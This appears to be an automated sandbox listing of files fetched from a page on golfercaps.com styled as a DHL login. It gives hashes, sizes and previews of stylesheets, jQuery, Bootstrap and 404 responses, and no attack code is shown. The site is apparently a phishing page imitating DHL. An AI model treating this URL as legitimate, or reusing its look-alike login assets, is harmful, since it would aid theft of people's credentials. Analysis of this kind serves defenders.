                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (365)
                                                                  Category:downloaded
                                                                  Size (bytes):8221
                                                                  Entropy (8bit):5.10134456154954
                                                                  Encrypted:false
                                                                  SSDEEP:192:uMf12A5VL4Ar7OMbLSzglkgMj/w2nPki2XS/zLdy:uVj/w2ci2XS/zLdy
                                                                  MD5:ED6778CE4A76E271BCDBBAD4F29748E0
                                                                  SHA1:A308B5537946DE680D6B3B8D1B1713A07E0CA9A3
                                                                  SHA-256:1904DB6E22BD90E52D977091CF9847629D920442D16BD055E08022647F857057
                                                                  SHA-512:D105B7F75721C83C275F56F7F654B567815580678B4094A003E3B5B2863BE5886DD75CC1B27CA6CB66B85D44C9400452BB4578C5527649D214E9327C75B90C67
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/_.css
                                                                  Preview:/* Code tidied up by ScrapBook */..margin { color: rgb(255, 255, 255); }..button { color: rgb(204, 0, 0); }..finalbutton { color: rgb(153, 0, 0); }..loginPage { background-color: rgb(255, 204, 0); border: 1px solid rgb(98, 95, 96); }..loginPageBackground { background-color: rgb(255, 204, 0); }..remindPasswordCenter { background-color: rgb(237, 238, 237); }..welcomeText { color: rgb(0, 0, 0); }..loginPageTopBar { background-color: rgb(204, 0, 0); color: rgb(255, 255, 255); }..contentHeader.loginPageTopBar { border-bottom: 1px solid rgb(98, 95, 96); }..loginFormBoxColor { background-color: rgb(237, 238, 237); }..loginFormCenter td { color: rgb(93, 97, 98); }..loginFormFonts { color: rgb(93, 97, 98); }.a.marginLP:active { color: rgb(93, 97, 98); }.a.marginLP:link { color: rgb(93, 97, 98); }.a.marginLP:visited { color: rgb(93, 97, 98); }.a.marginLP:hover { color: rgb(93, 97, 98); }.a.memarginLP:active { color: rgb(93, 97, 98); }.a.memarginLP:link { color: rgb(93, 97, 98); }.a.memarginLP:vi
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):8820
                                                                  Entropy (8bit):4.862808831724264
                                                                  Encrypted:false
                                                                  SSDEEP:96:UpocXWnwhkRM2RMSqRMBRzaLX5nSQeeonGuG1:UjyZGGaT5nSQ5GL2
                                                                  MD5:461E8D56CF7FDC4D75E287C3F2B86D5B
                                                                  SHA1:40C8A429D8F288F077AD58007A18CAE86D0ED5B6
                                                                  SHA-256:5F02395D081BA1351DEF395136ED05B92A08DA41D05B08C8F59F79C2251E81F4
                                                                  SHA-512:2BE87D8EE008EF2455E1A8D4C11AFC859422A75F959C8CA55C6D10E93E5F62469A4D85FC337920C85C14D72755BA6BE4935B7B4E9DF4D1B472EE418C84C9ECF7
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/
                                                                  Preview:<html>....<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <link rel="stylesheet" href="assets/jquery-ui.structure.css">.. <link rel="stylesheet" href="assets/jquery-ui.theme.css">.. <link rel="stylesheet" href="assets/axit-jquery.dialog.css">.. <link rel="stylesheet" href="assets/axit-jquery.datepicker.css">.. <link rel="stylesheet" href="assets/axit-jquery.autocomplete.css">.. <link rel="stylesheet" href="assets/jquery.menu.css">.. <title>.. DHL.. </title>.. <link rel="stylesheet" href="assets/stdweborder.css">.. <link rel="stylesheet" href="assets/mePanel.css">.. <link rel="stylesheet" href="assets/meBubble.css">.. <link rel="stylesheet" href="assets/_.css">.. <link rel="stylesheet" href="assets/login.css">.. <link rel="stylesheet" href="assets/loginPage18.css">..</head>....<body class="page-login">.. <div class="fullPageBackground" style="background-image: url(assets/bg.jpg);">.. <div id="lo
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (32012)
                                                                  Category:dropped
                                                                  Size (bytes):69597
                                                                  Entropy (8bit):5.369216080582935
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 92 x 87, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.068159130770307
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPlzIrIp/l6yxl/k4E08up:6v/lhPKUp/oy7Tp
                                                                  MD5:9C5F1B45BC2947192DCE45D0B97DCC8C
                                                                  SHA1:0D2870BD4B0D4F179BE2F89643C326D5A770B065
                                                                  SHA-256:972A96C7C49E30EAF2011E60DD89A40DA31DB379CD18113DAE54658ECF567082
                                                                  SHA-512:4EB48A1C7E0AE206E3C2E4D52C44DC1ED9D2F158D348F7443FFDE6A0E85E9491639626A0705AA0BC038F6C15748DA9E7B2279F8B0CF685A22D9CC93A4FD75DE5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.PNG........IHDR...\...W......J......IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):4030
                                                                  Entropy (8bit):4.994885621166022
                                                                  Encrypted:false
                                                                  SSDEEP:96:6Ro8K2dLaM67Ywvkmw8ZGYLm8C0E15FhK28Qp8qj1M00mxN+g8WXvE9l:d8ekPDKXUU7l
                                                                  MD5:E2E8409D9C6A2828FEEB2254E1156CC2
                                                                  SHA1:D2CB12587B40EA1DBC060BAA2B1D24FBBEEFB961
                                                                  SHA-256:F012B38922265EF3F9A3BC333046182287F222EAF2E74341F265F6D194489C91
                                                                  SHA-512:2303799F2622E430F6E80B3F31715658566FE3E71EFCB4CE07478B04A3AE9E99F84278F608954CAD111E6FBFEC3DAD51F548B45CEA2F6C9690137024054A8683
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/loginPage18.css
                                                                  Preview:/* Code tidied up by ScrapBook */.body { margin: 0px; }..fullPageBackground { position: relative; background-position: center center; background-repeat: no-repeat; background-size: cover; height: 100vh; }.#loginPage18.login-tab { margin: auto; top: 25vh; width: 385px; font-size: 12pt; position: relative; height: auto; }.#loginPage18.login-tab.extended { height: 100%; max-height: 60vh; }.#loginPage18 .login-tab__main-div { padding-top: 65px; margin: auto; width: 240px; text-align: center; padding-bottom: 65px; height: calc(100% - 130px); }.#loginPage18 .login-tab__logo { max-width: 240px; max-height: 90px; }.#loginPage18 .login-tab__logo--default-logo { background-size: contain; background-repeat: no-repeat; margin: auto; }.#loginPage18 .login-form-view__login-input { display: block; padding: 0px 6px; margin: 12px 0px 0px; width: 226px; height: 30px; border: 1px solid rgb(204, 204, 204); }.#loginPage18 .login-information-view { display: none; }.#loginPage18 .login-information-view__welc
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (32012)
                                                                  Category:downloaded
                                                                  Size (bytes):69597
                                                                  Entropy (8bit):5.369216080582935
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 92 x 87, 8-bit/color RGB, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.068159130770307
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPlzIrIp/l6yxl/k4E08up:6v/lhPKUp/oy7Tp
                                                                  MD5:9C5F1B45BC2947192DCE45D0B97DCC8C
                                                                  SHA1:0D2870BD4B0D4F179BE2F89643C326D5A770B065
                                                                  SHA-256:972A96C7C49E30EAF2011E60DD89A40DA31DB379CD18113DAE54658ECF567082
                                                                  SHA-512:4EB48A1C7E0AE206E3C2E4D52C44DC1ED9D2F158D348F7443FFDE6A0E85E9491639626A0705AA0BC038F6C15748DA9E7B2279F8B0CF685A22D9CC93A4FD75DE5
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbH
                                                                  Preview:.PNG........IHDR...\...W......J......IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):586
                                                                  Entropy (8bit):5.048500381544922
                                                                  Encrypted:false
                                                                  SSDEEP:12:UDGoEqLNs7CCmvPbD2LNZ/NZ/zmRRTQNIMR/6Zc:XoL2gzD2j/NgnUYc
                                                                  MD5:AAD10B08CC131BB1B607B0A2F315ACD0
                                                                  SHA1:8A3943CA42B82EF9AE56BAC3899A207B99DE3E20
                                                                  SHA-256:23B4160CAB1AB1B5A0F4B3C5C9C3B07980F200DC2F873F83CA374C1016456394
                                                                  SHA-512:BAD4DE0DB16DE29776C740D9C50BBFE417954D2CD55FF2224609F9318C5FFE72EDA238380676864416D5845349D04FD5A9AEEAB18EA02D9ECFDFAE6FEDEFD53B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/mePanel.css
                                                                  Preview:/* Code tidied up by ScrapBook */..meLogin_Panel_brown_stripe { background: transparent url("meLogin_diagonal.png") repeat scroll 0% 0%; height: 10px; width: 100%; overflow: hidden; }..meLoginPanel_border { width: 100%; }..meLoginPanel_table { vertical-align: middle; background: transparent url("meLogin_barLine.png") repeat-x scroll 0px 0px; height: 56px; margin: 0px; width: 100%; text-align: left; }..meLoginPanel_table td { padding-left: 59px; }..meLoginPanel_inner { font-family: Arial,Geneva,helvetica,sans-serif; font-size: 15px; font-weight: bold; color: rgb(255, 255, 255); }.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (32065)
                                                                  Category:dropped
                                                                  Size (bytes):85578
                                                                  Entropy (8bit):5.366055229017455
                                                                  Encrypted:false
                                                                  SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):1200
                                                                  Entropy (8bit):4.934493065632289
                                                                  Encrypted:false
                                                                  SSDEEP:24:Xo7spZZsux/oOtWbcbpmDAF4YuPAFt9dARqhjU2hjqrFNMK2sdUat9A1HD6Zkyy1:AsHZsIJtWOeVXYHhNhkqjsdU2A5WZkyC
                                                                  MD5:DFF554498E6106EABBE5D424A2618389
                                                                  SHA1:E22AFF34E8F6B5071CEAA533EE153C53E63B7DF5
                                                                  SHA-256:C0D1779485AE32A7D13667DA7F8A4D93EAA3CF51C414A4CE695C8FBA2DEBFE6A
                                                                  SHA-512:EF12296B6A229BC44D06D066A615E4A62F293612CB776011180421876E327164F92BDBAF4ED4463F2817AD14C5C39CADDFC36B894783D021511887832552C42D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.dialog.css
                                                                  Preview:/* Code tidied up by ScrapBook */..ui-dialog .ui-dialog-titlebar-close span { display: block; margin-top: -7.5px; }..ui-dialog .ui-dialog-title { float: left; margin: 0px 0px 0.2em 0.2em; }..ui-widget-overlay { background-color: rgb(0, 0, 0); opacity: 0.3; }..ui-dialog .ui-corner-all, .ui-dialog.ui-corner-all { border-radius: 0px; }..ui-state-default.ui-button-icon-only.ui-dialog-titlebar-close { border: medium none; background: transparent none repeat scroll 0% 0%; font-weight: normal; color: rgb(85, 85, 85); outline: medium none; }..ui-widget-header .ui-icon.ui-icon-closethick { background: transparent url("close.png") repeat scroll 0% 0% / contain ; }.#exit_icon { background: transparent url("close.png") repeat scroll 0% 0% / contain ; }..changeIdentityDialog { border-width: 0px; }..progressBox { background-color: rgb(255, 255, 255); border: 2px solid rgb(34, 48, 140); padding: 5px; overflow: hidden; }..progressBox .ui-dialog-titlebar { display: none; }..ui-widget input, .ui-widget
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (50758)
                                                                  Category:dropped
                                                                  Size (bytes):51039
                                                                  Entropy (8bit):5.247253437401007
                                                                  Encrypted:false
                                                                  SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48664)
                                                                  Category:downloaded
                                                                  Size (bytes):48944
                                                                  Entropy (8bit):5.272507874206726
                                                                  Encrypted:false
                                                                  SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
